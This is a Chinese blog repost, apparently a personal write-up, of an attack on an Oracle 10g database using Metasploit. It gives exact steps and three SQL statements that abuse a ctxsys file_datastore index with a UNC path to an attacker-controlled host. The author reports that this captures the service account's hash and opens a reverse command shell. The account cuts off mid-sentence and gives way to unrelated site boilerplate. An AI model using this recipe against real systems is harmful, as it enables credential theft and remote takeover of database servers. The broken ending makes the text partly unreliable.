这几天看了篇叫”Penetration: from application down to OS (原理分析看原文吧,我这里把我的测试过程写出来.
我的渗透环境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 数据库版本为 10.2.0.1.0,服务启动权限为 administrator,数据库账户用的是 dbsnmp 账户的默认权限.
1.先用 netstat 命令查看一下,本地的 139 端口有没有占用,一般占用此端口的服务就是 Samba 了,要关掉。ubuntu 的关闭方法是 sudo /etc/init.d/samba stop
2.运行 metasploit,我选用的 PAYLOAD 是 shell_reverse_tcp,做好相应配置后,exploit.就能用 netstat 看到本地已经监听了 139 和 8522 端口了.
3.我现在使用 dbsnmp 默认账户连接到 oracle 数据库上,这个账户默认权限是比较低的,只有 connect和 resource 权限。
4.然后执行下面 3 条 SQL 语句
SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255)UNIQUE,ot_format VARCHAR(6));
SQL> INSERT INTO files VALUES(1,’\192.168.1.52mickey’,NULL);
SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context2 PARAMETERS(‘datastore ctxsys.file_datastore format column ot_format’);
当执行完 create index 这句的时候,在看咱们本地的 metasploit,就已经得到 ORACLE 数据库主机的系统当前服务用户的 half lm 哈希和 cmdshell 了。
后来经过 pt007 的提醒,我又测试了
—-想了解更多的数据库相关异常处理怎么解决关注
”
本文来自网络收集,不代表猴子技术宅立场,如涉及侵权请点击右边联系管理员删除。
如若转载,请注明出处:https://www.ssfiction.com/sqljc/79234.html
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
